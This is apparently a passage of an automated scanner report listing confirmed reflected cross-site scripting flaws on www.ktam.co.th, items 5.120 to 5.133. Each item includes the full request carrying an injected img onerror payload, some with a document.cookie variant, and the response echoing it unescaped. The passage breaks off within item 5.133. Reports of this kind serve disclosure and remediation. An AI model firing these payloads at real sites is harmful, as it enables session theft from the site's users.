Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29529

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_ktamonline.gif4b64d\"><img src=a onerror=alert(1)>b6ce0f48117" title="THAI">
...[SNIP]...

5.120. http://www.ktam.co.th/en/index.php/ims/p_line001.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_line001.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63aa2"><img%20src%3da%20onerror%3dalert(1)>b83b3ad0258 was submitted in the REST URL parameter 4. This input was echoed as 63aa2\"><img src=a onerror=alert(1)>b83b3ad0258 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_line001.gif63aa2"><img%20src%3da%20onerror%3dalert(1)>b83b3ad0258 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:23 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_line001.gif63aa2\"><img src=a onerror=alert(1)>b83b3ad0258" title="THAI">
...[SNIP]...

5.121. http://www.ktam.co.th/en/index.php/ims/p_line002.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_line002.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c5d3"><img%20src%3da%20onerror%3dalert(1)>ea9b8f98879 was submitted in the REST URL parameter 4. This input was echoed as 8c5d3\"><img src=a onerror=alert(1)>ea9b8f98879 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_line002.gif8c5d3"><img%20src%3da%20onerror%3dalert(1)>ea9b8f98879 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:25 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_line002.gif8c5d3\"><img src=a onerror=alert(1)>ea9b8f98879" title="THAI">
...[SNIP]...

5.122. http://www.ktam.co.th/en/index.php/ims/p_link01.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link01.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ec99"><img%20src%3da%20onerror%3dalert(1)>46d62b730f9 was submitted in the REST URL parameter 4. This input was echoed as 1ec99\"><img src=a onerror=alert(1)>46d62b730f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_link01.gif1ec99"><img%20src%3da%20onerror%3dalert(1)>46d62b730f9 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:05 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_link01.gif1ec99\"><img src=a onerror=alert(1)>46d62b730f9" title="THAI">
...[SNIP]...

5.123. http://www.ktam.co.th/en/index.php/ims/p_link02.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link02.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eae1"><img%20src%3da%20onerror%3dalert(1)>85753e23ea8 was submitted in the REST URL parameter 4. This input was echoed as 9eae1\"><img src=a onerror=alert(1)>85753e23ea8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_link02.gif9eae1"><img%20src%3da%20onerror%3dalert(1)>85753e23ea8 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:02 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_link02.gif9eae1\"><img src=a onerror=alert(1)>85753e23ea8" title="THAI">
...[SNIP]...

5.124. http://www.ktam.co.th/en/index.php/ims/p_link03.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link03.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ce72"><img%20src%3da%20onerror%3dalert(1)>42cb58bdd30 was submitted in the REST URL parameter 4. This input was echoed as 4ce72\"><img src=a onerror=alert(1)>42cb58bdd30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_link03.gif4ce72"><img%20src%3da%20onerror%3dalert(1)>42cb58bdd30 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:10 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_link03.gif4ce72\"><img src=a onerror=alert(1)>42cb58bdd30" title="THAI">
...[SNIP]...

5.125. http://www.ktam.co.th/en/index.php/ims/p_link04.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link04.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74f30"><img%20src%3da%20onerror%3dalert(1)>1a261ced02e was submitted in the REST URL parameter 4. This input was echoed as 74f30\"><img src=a onerror=alert(1)>1a261ced02e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_link04.gif74f30"><img%20src%3da%20onerror%3dalert(1)>1a261ced02e HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:02 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_link04.gif74f30\"><img src=a onerror=alert(1)>1a261ced02e" title="THAI">
...[SNIP]...

5.126. http://www.ktam.co.th/en/index.php/ims/p_link05.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link05.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54ff0"><img%20src%3da%20onerror%3dalert(1)>41c460870d1 was submitted in the REST URL parameter 4. This input was echoed as 54ff0\"><img src=a onerror=alert(1)>41c460870d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_link05.gif54ff0"><img%20src%3da%20onerror%3dalert(1)>41c460870d1 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:08 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_link05.gif54ff0\"><img src=a onerror=alert(1)>41c460870d1" title="THAI">
...[SNIP]...

5.127. http://www.ktam.co.th/en/index.php/ims/p_link06.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link06.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c3a6"><img%20src%3da%20onerror%3dalert(1)>df9bb2914aa was submitted in the REST URL parameter 4. This input was echoed as 2c3a6\"><img src=a onerror=alert(1)>df9bb2914aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_link06.gif2c3a6"><img%20src%3da%20onerror%3dalert(1)>df9bb2914aa HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:07 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_link06.gif2c3a6\"><img src=a onerror=alert(1)>df9bb2914aa" title="THAI">
...[SNIP]...

5.128. http://www.ktam.co.th/en/index.php/ims/p_logo1.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_logo1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97605"><img%20src%3da%20onerror%3dalert(1)>a410ae3e2e4 was submitted in the REST URL parameter 4. This input was echoed as 97605\"><img src=a onerror=alert(1)>a410ae3e2e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_logo1.gif97605"><img%20src%3da%20onerror%3dalert(1)>a410ae3e2e4 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:58 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_logo1.gif97605\"><img src=a onerror=alert(1)>a410ae3e2e4" title="THAI">
...[SNIP]...

5.129. http://www.ktam.co.th/en/index.php/ims/p_word1.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_word1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 819a5"><img%20src%3da%20onerror%3dalert(1)>8e9776f713f was submitted in the REST URL parameter 4. This input was echoed as 819a5\"><img src=a onerror=alert(1)>8e9776f713f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_word1.gif819a5"><img%20src%3da%20onerror%3dalert(1)>8e9776f713f HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:56 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_word1.gif819a5\"><img src=a onerror=alert(1)>8e9776f713f" title="THAI">
...[SNIP]...

5.130. http://www.ktam.co.th/en/index.php/media_box.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/media_box.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fb33"><img%20src%3da%20onerror%3dalert(1)>40630af8d34 was submitted in the REST URL parameter 3. This input was echoed as 3fb33\"><img src=a onerror=alert(1)>40630af8d34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/media_box.php3fb33"><img%20src%3da%20onerror%3dalert(1)>40630af8d34 HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:00 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/media_box.php3fb33\"><img src=a onerror=alert(1)>40630af8d34" title="THAI">
...[SNIP]...

5.131. http://www.ktam.co.th/en/index.php/media_box.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/media_box.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61746"><img%20src%3da%20onerror%3dalert(1)>750ab4d0afe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61746\"><img src=a onerror=alert(1)>750ab4d0afe in the application's response. Although the scanner classifies this as a parameter-name reflection, the request shows the payload supplied as an additional path segment after media_box.php, and the response copies only that final segment (../th/61746\"...) into the language-switch link. This is therefore the same path reflection as the REST URL parameter findings above, reached through a different path shape; the same applies to the other "name of an arbitrarily supplied request parameter" findings against this host.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/media_box.php/61746"><img%20src%3da%20onerror%3dalert(1)>750ab4d0afe HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:41:07 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29511

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/61746\"><img src=a onerror=alert(1)>750ab4d0afe" title="THAI">
...[SNIP]...

5.132. http://www.ktam.co.th/en/index.php/news.inc.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/news.inc.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16f4c"><img%20src%3da%20onerror%3dalert(1)>e13d7efc859 was submitted in the REST URL parameter 3. This input was echoed as 16f4c\"><img src=a onerror=alert(1)>e13d7efc859 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/news.inc.php16f4c"><img%20src%3da%20onerror%3dalert(1)>e13d7efc859 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:08 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/news.inc.php16f4c\"><img src=a onerror=alert(1)>e13d7efc859" title="THAI">
...[SNIP]...

5.133. http://www.ktam.co.th/en/index.php/news.inc.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/news.inc.php

Issue detail

